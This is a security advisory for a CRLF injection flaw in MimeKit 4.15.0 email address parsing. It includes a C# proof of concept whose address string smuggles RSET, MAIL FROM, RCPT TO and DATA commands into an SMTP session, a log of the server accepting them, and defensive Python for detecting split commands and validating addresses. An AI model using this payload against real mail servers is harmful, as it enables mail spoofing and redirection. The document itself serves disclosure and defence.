CVE-2026-30227 is a low severity vulnerability with a CVSS score of 0.0. No known exploits currently, and patches are available.
Lower probability of exploitation
A CRLF Injection vulnerability in MimeKit 4.15.0 allows an attacker to embed \r\n into the SMTP envelope address local-part (when the local-part is a quoted-string). This is non-compliant with RFC 5321 and can result in SMTP command injection (e.g., injecting additional RCPT TO / DATA / RSET commands) and/or mail header injection, depending on how the application uses MailKit/MimeKit to construct and send messages. The issue becomes exploitable when the attacker can influence a MailboxAddress (MAIL FROM / RCPT TO) value that is later serialized to an SMTP session.
RFC 5321 explicitly defines the SMTP mailbox local-part grammar and does not permit CR (13) or LF (10) inside Quoted-string (qtextSMTP and quoted-pairSMTP ranges exclude control characters). SMTP commands are terminated by <CRLF>, making CRLF injection in command arguments particularly dangerous.
RFC 5321 defines:
mail = "MAIL FROM:" Reverse-path [SP Mail-parameters] CRLF
Reverse-path = Path / "<>"
Path = "<" [ A-d-l ":" ] Mailbox ">"
A-d-l = At-domain *( "," At-domain )
At-domain = "@" Domain
Mailbox = Local-part "@" ( Domain / address-literal )
Local-part = Dot-string / Quoted-string
Dot-string = Atom *("." Atom)
Atom = 1*atext
atext = ALPHA / DIGIT /
"!" / "#" / "$" / "%" / "&" / "'" / "*" / "+" / "-" / "/" /
"=" / "?" / "^" / "_" / "`" / "{" / "|" / "}" / "~"
Quoted-string = DQUOTE *QcontentSMTP DQUOTE
QcontentSMTP = qtextSMTP / quoted-pairSMTP
quoted-pairSMTP = %d92 %d32-126
qtextSMTP = %d32-33 / %d35-91 / %d93-126
When the local part is a quoted string, the characters <CR> and <LF> are not allowed.
In MimeKit 4.15.0, the local-part parser does not detect or reject <CR> and <LF> characters inside a double-quoted local-part.
As a result, MailboxAddress can accept addresses like "attacker\r\nRCPT TO:<victim@target>\r\n"@example.com as a valid address.
MailboxAddress from that input, and
Environment:
mimekit_poc.csproj
<Project Sdk="Microsoft.NET.Sdk">
  <PropertyGroup>
    <OutputType>Exe</OutputType>
    <TargetFramework>net8.0</TargetFramework>
    <ImplicitUsings>enable</ImplicitUsings>
    <Nullable>enable</Nullable>
  </PropertyGroup>
  <ItemGroup>
    <PackageReference Include="MailKit" Version="4.15.0" />
  </ItemGroup>
</Project>
using MailKit.Net.Smtp;
using MailKit.Security;
using MailKit;
using MimeKit;

// === payload and target setting ===
var smtpHost = "xx.xx.xx.xx";
var smtpPort = 25;
var useTls = false;

// attack in `MAIL FROM` cmd with address grammar in double quote
var payloadEvilMailFromInput = "\"attack\r\nRSET\r\nMAIL FROM:<[email protected]>\r\nRCPT TO:<[email protected]>\r\nDATA\r\n.\r\nQUIT\r\nhere\"@poc.send.com";

// log in log/smtp_log_{yyyyMMdd_HHmmss_fff}.txt
var logDir = Path.Combine(AppContext.BaseDirectory, "log");
Directory.CreateDirectory(logDir);
var timestamp = DateTime.Now.ToString("yyyyMMdd_HHmmss_fff");
var logPath = Path.Combine(logDir, $"smtp_log_{timestamp}.txt");

// === below smtp session ===
// mimekit api: MailboxAddress accepts the CRLF-bearing quoted local-part without throwing
var envelopeFrom = new MailboxAddress("", payloadEvilMailFromInput);
var envelopeRcpt = new MailboxAddress("", "\"kc1zs4\"@poc.recv.com");
var headerFrom = new MailboxAddress("Sender", "[email protected]");
var headerTo = new MailboxAddress("Recipient", "[email protected]");

var message = new MimeMessage();
message.From.Add(headerFrom);
message.To.Add(headerTo);
message.Subject = "mimekit CRLF injection poc";
message.Body = new TextPart("plain") { Text = "Hello from MimeKit 4.15.0" };

try {
    // ProtocolLogger records the raw C:/S: lines of the session to logPath
    using var protocolLogger = new ProtocolLogger(logPath);
    using var client = new SmtpClient(protocolLogger);
    var socketOption = useTls ? SecureSocketOptions.StartTls : SecureSocketOptions.None;
    client.Connect(smtpHost, smtpPort, socketOption);
    // envelope sender/recipient are passed explicitly and serialized into MAIL FROM / RCPT TO
    client.Send(FormatOptions.Default, message, envelopeFrom, new[] { envelopeRcpt });
    client.Disconnect(true);
    Console.WriteLine("[+] successfully send mail");
    Console.WriteLine($"[+] view smtp session log at: {logPath}");
} catch (SmtpCommandException ex) {
    Console.Error.WriteLine($"[!] smtp cmd err: {ex.StatusCode} - {ex.Message}");
    Console.Error.WriteLine($"[!] view smtp session log at: {logPath}");
    Environment.ExitCode = 1;
} catch (SmtpProtocolException ex) {
    Console.Error.WriteLine($"[!] smtp protocol err: {ex.Message}");
    Console.Error.WriteLine($"[!] view smtp session log at: {logPath}");
    Environment.ExitCode = 1;
} catch (Exception ex) {
    Console.Error.WriteLine($"[!] unknown err: {ex.Message}");
    Console.Error.WriteLine($"[!] view smtp session log at: {logPath}");
    Environment.ExitCode = 1;
}
- MailboxAddress accepts the injected addr-spec containing CRLF inside the quoted local-part because it relies on quoted-string skipping that does not reject CR/LF.
- The SMTP session log shows the MAIL FROM line being split by the injected CRLF, followed by attacker-controlled SMTP commands.
- tcpdump also shows the same raw SMTP stream (optional confirmation).
Example (illustrative) excerpt from the SMTP session log showing the CRLF injection effect:
Connected to smtp://xxx.xxx.xxx.xxx:25/
S: 220 xxx Axigen ESMTP ready
C: EHLO KC1zs4-TPt14p
S: 250-xxx Axigen ESMTP hello
S: 250-PIPELINING
S: 250-AUTH PLAIN LOGIN CRAM-MD5 DIGEST-MD5 GSSAPI
S: 250-AUTH=PLAIN LOGIN CRAM-MD5 DIGEST-MD5 GSSAPI
S: 250-8BITMIME
S: 250-SIZE 10485760
S: 250-HELP
S: 250 OK
C: MAIL FROM:<"attack
C: RSET
C: MAIL FROM:<[email protected]>
C: RCPT TO:<[email protected]>
C: DATA
C: .
C: QUIT
C: here"@poc.send.com> SIZE=293
C: RCPT TO:<"kc1zs4"@poc.recv.com>
S: 553 Invalid mail address
S: 250 Reset done
S: 250 Sender accepted
S: 250 Recipient accepted
S: 354 Ready to receive data; remember <CRLF>.<CRLF>
S: 250 Mail queued for delivery
S: 221-xxx Axigen ESMTP is closing connection
S: 221 Good bye
C: RSET
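The split MAIL FROM line in the excerpt above is also a detection opportunity for anyone reviewing MailKit protocol logs. The following Python is an added example (not part of the advisory and not MailKit/MimeKit code) that scans a ProtocolLogger-style transcript (client lines prefixed `C: `, server lines prefixed `S: `, the format of the excerpt above; assumed to hold for the logger in general) for a client MAIL FROM / RCPT TO whose `<...>` Path does not close on the same line, and collects the client lines that follow until the quoted local-part and Path finally close. The sample transcript is constructed to mirror the excerpt with placeholder addresses; `analyze_session` and `_path_closes` are names chosen here.

```python
"""Detect a split MAIL FROM / RCPT TO command in an SMTP protocol transcript.

Added example (not MailKit/MimeKit code). Assumes MailKit ProtocolLogger-style
lines: client lines prefixed "C: ", server lines prefixed "S: ".
A well-formed envelope command keeps its whole Path "<...>" on one line; if a
CRLF was injected into a quoted local-part, the line ends inside the quoted
string and the remainder shows up as extra client lines.
"""
import re

ENVELOPE_CMD = re.compile(r"^(MAIL FROM|RCPT TO):<(.*)$", re.IGNORECASE)

# Constructed transcript mirroring the advisory's excerpt (placeholder addresses).
SAMPLE_LOG = "\n".join([
    "S: 220 mail.example.invalid ESMTP ready",
    "C: EHLO client.example.invalid",
    "S: 250 OK",
    'C: MAIL FROM:<"attack',
    "C: RSET",
    "C: MAIL FROM:<spoofed@example.invalid>",
    "C: RCPT TO:<target@example.invalid>",
    "C: DATA",
    "C: .",
    "C: QUIT",
    'C: here"@example.invalid> SIZE=293',
    'C: RCPT TO:<"kc1zs4"@example.invalid>',
    "S: 553 Invalid mail address",
    "S: 250 Reset done",
])

# Constructed healthy session for comparison: every Path closes on its own line.
CLEAN_LOG = "\n".join([
    "S: 220 mail.example.invalid ESMTP ready",
    "C: EHLO client.example.invalid",
    "S: 250 OK",
    'C: MAIL FROM:<"john doe"@example.invalid> SIZE=100',
    "S: 250 Sender accepted",
    "C: RCPT TO:<target@example.invalid>",
    "S: 250 Recipient accepted",
])


def _path_closes(text: str, in_quote: bool = False) -> bool:
    """True if a '>' appears outside a quoted-string (honouring quoted-pair escapes)."""
    i = 0
    while i < len(text):
        ch = text[i]
        if in_quote:
            if ch == "\\":
                i += 2          # quoted-pair: skip the escaped character
                continue
            if ch == '"':
                in_quote = False
        elif ch == '"':
            in_quote = True
        elif ch == ">":
            return True
        i += 1
    return False


def analyze_session(log_text: str) -> list[dict]:
    """Return one finding per envelope command whose Path does not close on its own line."""
    lines = log_text.splitlines()
    findings = []
    i = 0
    while i < len(lines):
        line = lines[i]
        m = ENVELOPE_CMD.match(line[3:]) if line.startswith("C: ") else None
        if m and not _path_closes(m.group(2)):
            # The command ended inside the quoted local-part: every client line up to the
            # one that finally closes the quote and the Path was sent as its own command.
            injected = []
            j = i + 1
            while j < len(lines):
                if lines[j].startswith("C: "):
                    if _path_closes(lines[j][3:], in_quote=True):
                        break
                    injected.append(lines[j][3:])
                j += 1
            findings.append({"line": i + 1, "command": m.group(1).upper(), "injected_lines": injected})
            i = j
        i += 1
    return findings


if __name__ == "__main__":
    for f in analyze_session(SAMPLE_LOG):
        print(f"line {f['line']}: {f['command']} split by CRLF; "
              f"{len(f['injected_lines'])} injected client line(s): {f['injected_lines']}")
```

On the constructed transcript this reports the MAIL FROM on line 4 with six injected client lines; the healthy session produces no findings. The same check can be run over archived ProtocolLogger files to find past sessions where an envelope address was not kept on one command line.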
Notes:
- A minimal PoC using only the public API (constructing a MailboxAddress) is sufficient to demonstrate the vulnerability class and protocol non-compliance.
- SMTP commands are terminated by <CRLF>, so CRLF-in-argument is structurally hazardous by design.
Vulnerability class:
- CRLF injection in an SMTP envelope address, leading to SMTP command injection and/or mail header injection.
Who is impacted:
- Applications that use MailKit/MimeKit 4.15.0 to send mail and construct a MailboxAddress (MAIL FROM / RCPT TO) from attacker-influenced input.
Potential consequences:
- Injection of additional RCPT TO commands (mail redirection / data exfiltration).
- Injection of other commands (RSET, NOOP, etc.) or attempts at early DATA injection (server-dependent).
Suggested remediation (high level):
- Reject \r and \n in the local-part (and ideally anywhere in the address) when parsing/constructing mailbox addresses used for SMTP envelopes.
- Enforce the RFC 5321 qtextSMTP and quoted-pairSMTP ranges (no control characters).
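As an added example (not MimeKit/MailKit code and not the project's fix), the following Python implements the RFC 5321 Local-part grammar quoted earlier in this advisory and the application-side gate the remediation describes: validate the address and refuse to build an envelope address when the local-part contains anything outside the atext, qtextSMTP or quoted-pairSMTP ranges. The names `validate_local_part`, `validate_addr_spec` and `envelope_address_or_raise` are chosen here; the domain check is deliberately simplified to rejecting control characters, whitespace and angle brackets rather than implementing the full Domain / address-literal grammar. The sample inputs include the injected form shown above and are constructed.

```python
"""RFC 5321 local-part validator (added example; not MimeKit/MailKit code).

Grammar implemented (from the advisory's RFC 5321 excerpt):
  Local-part      = Dot-string / Quoted-string
  Dot-string      = Atom *("." Atom)        ; Atom = 1*atext
  Quoted-string   = DQUOTE *QcontentSMTP DQUOTE
  QcontentSMTP    = qtextSMTP / quoted-pairSMTP
  quoted-pairSMTP = %d92 %d32-126
  qtextSMTP       = %d32-33 / %d35-91 / %d93-126
Both alternatives exclude CR (13) and LF (10), which is the property that keeps
a MAIL FROM / RCPT TO command line from being split.
"""
import string

ATEXT = frozenset(string.ascii_letters + string.digits + "!#$%&'*+-/=?^_`{|}~")


def _is_qtext(ch: str) -> bool:
    c = ord(ch)
    return 32 <= c <= 33 or 35 <= c <= 91 or 93 <= c <= 126


def validate_local_part(local_part: str) -> tuple[bool, str]:
    """Return (ok, reason); reason names the rule that failed or the form matched."""
    if not local_part:
        return False, "empty local-part"
    if local_part[0] == '"':
        # Quoted-string: must end with an unescaped DQUOTE
        if len(local_part) < 2 or local_part[-1] != '"':
            return False, "quoted-string not terminated by DQUOTE"
        body = local_part[1:-1]
        i = 0
        while i < len(body):
            ch = body[i]
            if ch == "\\":
                # quoted-pairSMTP = %d92 %d32-126
                if i + 1 >= len(body) or not 32 <= ord(body[i + 1]) <= 126:
                    return False, f"invalid quoted-pair at offset {i + 1}"
                i += 2
                continue
            if not _is_qtext(ch):
                return False, f"byte {ord(ch)} not allowed in qtextSMTP at offset {i + 1}"
            i += 1
        return True, "quoted-string"
    # Dot-string: one or more non-empty Atoms separated by "."
    for atom in local_part.split("."):
        if not atom:
            return False, "empty Atom in Dot-string"
        bad = next((ch for ch in atom if ch not in ATEXT), None)
        if bad is not None:
            return False, f"byte {ord(bad)} is not atext"
    return True, "dot-string"


def validate_addr_spec(addr: str) -> tuple[bool, str]:
    """Split Mailbox = Local-part "@" Domain on the LAST '@' (a quoted local-part may contain '@')."""
    at = addr.rfind("@")
    if at <= 0 or at == len(addr) - 1:
        return False, "missing local-part or domain"
    local_part, domain = addr[:at], addr[at + 1:]
    ok, reason = validate_local_part(local_part)
    if not ok:
        return False, f"local-part: {reason}"
    # Simplified domain check (assumption: the full Domain / address-literal grammar is
    # not implemented here): no control characters, whitespace or angle brackets.
    if any(ord(ch) < 33 or ord(ch) > 126 or ch in "<>" for ch in domain):
        return False, "domain: control character, whitespace or angle bracket"
    return True, reason


def envelope_address_or_raise(addr: str) -> str:
    """Gate to apply before handing user input to MailboxAddress / MAIL FROM / RCPT TO."""
    ok, reason = validate_addr_spec(addr)
    if not ok:
        raise ValueError(f"rejected envelope address: {reason}")
    return addr


if __name__ == "__main__":
    # Constructed samples; the first is the injected form shown in the advisory.
    for sample in ['"attacker\r\nRCPT TO:<victim@target>\r\n"@example.com',
                   '"john doe"@example.com', 'first.last+tag@example.com',
                   'first..last@example.com']:
        print(repr(sample), "->", validate_addr_spec(sample))
```

The injected address is rejected at the first CR (byte 13) inside the quoted-string, while a quoted local-part containing a space or an escaped DQUOTE passes, which is the distinction the RFC grammar draws and the parser in 4.15.0 did not enforce. Running `envelope_address_or_raise` on any externally supplied sender or recipient before constructing a `MailboxAddress` keeps the application safe regardless of which MimeKit version is installed.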